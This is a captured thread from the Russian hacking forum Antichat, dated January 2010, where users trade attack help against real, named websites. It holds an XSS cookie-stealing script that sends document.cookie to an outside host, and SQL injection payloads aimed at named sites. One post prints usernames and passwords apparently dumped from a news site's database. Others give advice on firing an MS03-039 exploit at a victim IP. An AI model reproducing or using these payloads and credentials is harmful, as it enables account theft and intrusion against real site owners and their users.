ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11161  
Старый 09.01.2010, 19:05
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Nightmarе  
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
создай на своём хосте 1.js в него впиши
PHP код:
 img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
ну и где ты там нашел xss впиши :

PHP код:
<script src=http://site.ru/1.js></script> 
 
Ответить с цитированием

  #11162  
Старый 09.01.2010, 20:15
Аватар для Cry Wolf
Cry Wolf
Новичок
Регистрация: 18.07.2008
Сообщений: 12
Провел на форуме:
99313

Репутация: 3
Отправить сообщение для Cry Wolf с помощью ICQ
По умолчанию

Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.


выглядит так:
Код:
/reset?char=Fate
Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.

Примерно так:

Status On

Name Fate

Class Fairy Elf

Level 1

Resets 0

PK Level Default

Map Devias

Strenght 22

Agility 25

Vitality 10

Energy 15

[code]/reset?char=Fate'[code] выводит ошибку БД соответсвенно,

та же ошибка
Код:
/char/Fate'
та же в регестрации в поле e-mail.

Код:
char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1--
дает вывод

Status

Name darkknight

Class Dark Knight

Level 1

Resets 0

PK Level Default

Map Lorencia

Strenght 18

Agility 18

Vitality 15

Energy 30


Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.

Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.

Последний раз редактировалось Cry Wolf; 09.01.2010 в 20:17..
 
Ответить с цитированием

  #11163  
Старый 10.01.2010, 00:07
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Цитата:
Сообщение от v1d0qz  
Немогу понять, почему так пишет что перебор с колонками..
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select+count(*),concat(version(),floor(rand(0 )*2))from(information_schema.tables)GROUP+BY+2)#
а так всё ок.
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=111+or(1 ,1)=(select*from(select+name_con st(version(),1),name_const(version(),1))e)
Код:
http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+group+by+concat(version(),floor(rand(0)*2)))+--+
 
Ответить с цитированием

  #11164  
Старый 10.01.2010, 00:55
Аватар для Gidz
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022

Репутация: 4
По умолчанию

хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
Код:
_ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+

Последний раз редактировалось Gidz; 10.01.2010 в 02:45..
 
Ответить с цитированием

  #11165  
Старый 10.01.2010, 01:17
Аватар для [Life]
[Life]
Banned
Регистрация: 07.01.2010
Сообщений: 132
Провел на форуме:
63422

Репутация: 8
По умолчанию

вопрос по скулю:

Цитата:
+and+(select+top+1+isnull(cast([email]+as+nvarchar(4000)),char(32))%2bchar(94)%2bisnull( cast([password]+as+nvarchar(4000)),char(32))+from+[jackson]..[users]+where+email+not+in+(select+top+1+email+from+[jackson]..[users]+where+1=1+order+by+[email])+)%3E0--


тут выводится в ответе email@domain.com^passmy
Возможно ли сделать запрос чтобы выдавало не email@domain.com^passmy
а !!!email@domain.com^passmy!!!
Тоесть надо добавит 0x212121 в начало и конец каждого ответа
это чтоб со страницы корректно спарсит нужно
 
Ответить с цитированием

  #11166  
Старый 10.01.2010, 06:24
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
создай на своём хосте 1.js в него впиши
PHP код:
 img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
ну и где ты там нашел xss впиши :

PHP код:
<script src=http://site.ru/1.js></script> 
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.

Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
 
Ответить с цитированием

маф
  #11167  
Старый 10.01.2010, 09:27
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию маф

Цитата:
Сообщение от Gidz  
хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
пробовал хексить слово и потом по коду искать, но тоже ни как..
туц
Цитата:
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*-+&sec=2
Цитата:
зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
Код:
?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
но почему-то не могу к ней подключиться, ошибку пишет
Код:
?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
[/QUOTE]
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

Зы:Может не хватать прав на доступ

Последний раз редактировалось S00pY; 10.01.2010 в 09:32..
 
Ответить с цитированием

  #11168  
Старый 10.01.2010, 11:26
Аватар для DrakonSerg
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131

Репутация: 45
По умолчанию

Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
Что дальше?
 
Ответить с цитированием

  #11169  
Старый 10.01.2010, 14:44
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

В cmd выдает: usage 1.exe <target_ip>
Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
example:1.exe 192.168.0.1
Зы:Самого сплойта я не видел и насчет МС незнаю
 
Ответить с цитированием

  #11170  
Старый 10.01.2010, 15:21
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123

http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ